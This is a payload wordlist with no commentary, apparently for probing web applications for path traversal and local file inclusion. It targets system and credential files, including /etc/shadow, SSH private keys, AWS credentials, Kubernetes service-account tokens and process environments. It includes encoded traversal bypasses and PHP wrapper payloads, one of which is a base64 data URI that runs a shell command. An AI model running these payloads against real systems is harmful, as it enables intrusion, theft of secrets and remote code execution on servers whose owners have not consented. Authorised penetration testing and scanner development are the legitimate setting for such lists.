/etc/passwd
/etc/shadow
/etc/hosts
/etc/hostname
/etc/resolv.conf
/etc/network/interfaces
/etc/crontab
/etc/fstab
/etc/group
/etc/issue
/etc/motd
/etc/passwd~
/etc/shadow~
/etc/ssh/sshd_config
/etc/ssh/ssh_config
/etc/mysql/my.cnf
/etc/postgresql/postgresql.conf
/etc/apache2/apache2.conf
/etc/apache2/httpd.conf
/etc/nginx/nginx.conf
/etc/nginx/sites-enabled/default
/etc/php/php.ini
/etc/php7/php.ini
/etc/php8/php.ini
/etc/redis/redis.conf
/etc/mongod.conf
/etc/docker/daemon.json
/etc/kubernetes/admin.conf
/etc/kubernetes/kubelet.conf
/etc/kubernetes/controller-manager.conf
/etc/kubernetes/scheduler.conf
/proc/self/environ
/proc/self/cmdline
/proc/self/cwd
/proc/self/fd/0
/proc/self/fd/1
/proc/self/fd/2
/proc/version
/proc/cpuinfo
/proc/meminfo
/proc/mounts
/proc/net/tcp
/proc/net/udp
/proc/sched_debug
/proc/self/stat
/proc/self/status
/proc/self/maps
/var/log/auth.log
/var/log/syslog
/var/log/access.log
/var/log/error.log
/var/log/apache2/access.log
/var/log/apache2/error.log
/var/log/nginx/access.log
/var/log/nginx/error.log
/var/log/mysql/error.log
/var/log/mongodb/mongod.log
/var/log/dmesg
/var/log/secure
/var/log/boot.log
/var/log/mail.log
/var/log/cron
/var/log/messages
/var/run/secrets/kubernetes.io/serviceaccount/token
/var/run/secrets/kubernetes.io/serviceaccount/ca.crt
/var/run/secrets/kubernetes.io/serviceaccount/namespace
/home/ubuntu/.ssh/authorized_keys
/home/ubuntu/.ssh/id_rsa
/home/ubuntu/.ssh/id_ed25519
/home/ubuntu/.bash_history
/home/ubuntu/.bashrc
/home/ubuntu/.profile
/home/ubuntu/.aws/credentials
/home/ubuntu/.aws/config
/home/ubuntu/.docker/config.json
/home/ubuntu/.kube/config
/home/ubuntu/.gitconfig
/home/ubuntu/.npmrc
/home/ubuntu/.env
/root/.ssh/authorized_keys
/root/.ssh/id_rsa
/root/.bash_history
/root/.bashrc
/root/.profile
/root/.aws/credentials
../etc/passwd
../etc/shadow
../../etc/passwd
../../etc/shadow
../../../etc/passwd
../../../../etc/passwd
../../../../../etc/passwd
../../../../../../etc/passwd
../../../../../../../etc/passwd
../../../../../../../../etc/passwd
../../../../../../../../../etc/passwd
../../../../../../../../../../etc/passwd
....//....//etc/passwd
....//....//....//etc/passwd
..%2f..%2fetc/passwd
..%2f..%2f..%2fetc/passwd
..%252f..%252fetc/passwd
..%252f..%252f..%252fetc/passwd
..%c0%af..%c0%afetc/passwd
..%c0%af..%c0%af..%c0%afetc/passwd
..%ef%bc%8f..%ef%bc%8fetc/passwd
....\/....\/etc/passwd
/proc/self/root/etc/passwd
/proc/self/root/etc/shadow
/proc/self/cwd/etc/passwd
/proc/self/cwd/etc/shadow
/proc/self/cwd/../../../etc/passwd
/php://filter/convert.base64-encode/resource=/etc/passwd
/php://filter/convert.base64-encode/resource=index.php
/php://filter/convert.base64-encode/resource=config.php
/php://input
/data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgL2V0Yy9wYXNzd2QnKTs/Pg==
/expect://id
